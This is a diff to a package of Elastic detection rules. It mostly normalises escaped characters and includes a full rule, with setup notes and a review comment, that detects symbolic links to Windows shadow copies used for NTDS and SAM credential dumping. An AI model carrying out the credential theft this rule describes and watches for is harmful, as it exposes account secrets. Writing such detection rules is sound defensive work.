which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\")) or\n (process.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n",
+ "references": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink",
+ "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf",
+ "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/",
+ "https://www.hackingarticles.in/credential-dumping-ntds-dit/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.command_line",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0",
+ "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 
4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1003",
+ "name": "OS Credential Dumping",
+ "reference": "https://attack.mitre.org/techniques/T1003/",
+ "subtechnique": [
+ {
+ "id": "T1003.002",
+ "name": "Security Account Manager",
+ "reference": "https://attack.mitre.org/techniques/T1003/002/"
+ },
+ {
+ "id": "T1003.003",
+ "name": "NTDS",
+ "reference": "https://attack.mitre.org/techniques/T1003/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": 
"event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json
index e56508caf27..7f9e53b44d1 100644
--- a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json
index 61e92211a74..5e0f1b9d28a 100644
--- a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json
index 1d0ee00772d..60206f28c66 100644
--- a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json
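Review bot: The `setup` string of the new _109 file tells operators to enable Object Access auditing for Event ID 4656, but the `query` matches only process start events (`event.type == "start"` filtered on `process.args` / `process.command_line`) and none of the `required_fields` entries is a Windows Security audit field, so that audit policy is not something this rule consumes; the paragraph appears carried over from earlier versions and now reads as a prerequisite for the rule to fire. Either drop it from `setup` or prefix it with `Optional: only needed for follow-up triage of handle access to the shadow copy; this rule fires on process start events alone.` so that the `event.ingested` ingest-pipeline guidance, which is the real prerequisite, is not buried. The added `process.name : ("cmd.exe", "powershell.exe")` branch widens coverage to event sources without PE metadata and `required_fields` was updated to match; PowerShell 7 (`pwsh.exe`) still matches neither branch, which may be intended but is worth one line in `note`. The file also ends without a trailing newline (`\ No newline at end of file`), worth checking against what the generator emits for the sibling rule files.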
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -66,7 +66,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json
index 35f61f34e84..0773eeb22af 100644
--- a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json
@@ -45,7 +45,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json
index 014eeebe9c4..f672dbadde9 100644
--- a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json
index aa0f8619146..ccf09846bab 100644
--- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json
index 2cdcf59434c..d08837038ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json
index e0da874d19d..fdfbd1564dd 100644
--- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json
index ba3fb70a034..de0f763faa6 100644
--- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json index fdba714fb85..38728a454ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json index a8ba76e7aaf..ce79d2314ba 100644 
--- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json index b12a8b5eb64..efec1ff2caf 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json index ff1ef667dbf..cd1fe2900ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json index c48d554222d..46a25badd73 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json index f2ee562cd2f..dab82395353 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json index 2bee70b7522..b8b7140e041 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json index 48b5ed18f08..f4a00d27da2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json index 06702c57be0..90b2b359d92 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json index 3a77d565d42..89d9a559887 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json index bd3d13deb0c..1ad3bbd930b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
@@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json index fc98682d611..051aa9fcc69 100644 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json +++ b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json index a710a8c9a5a..668c785519d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json +++ b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json b/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json index 5244cc63ac1..3d37bc08540 100644 
--- a/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json index 0bce8001a2c..615f0f781fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json index e0d2858dbd2..fc3760bc199 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json 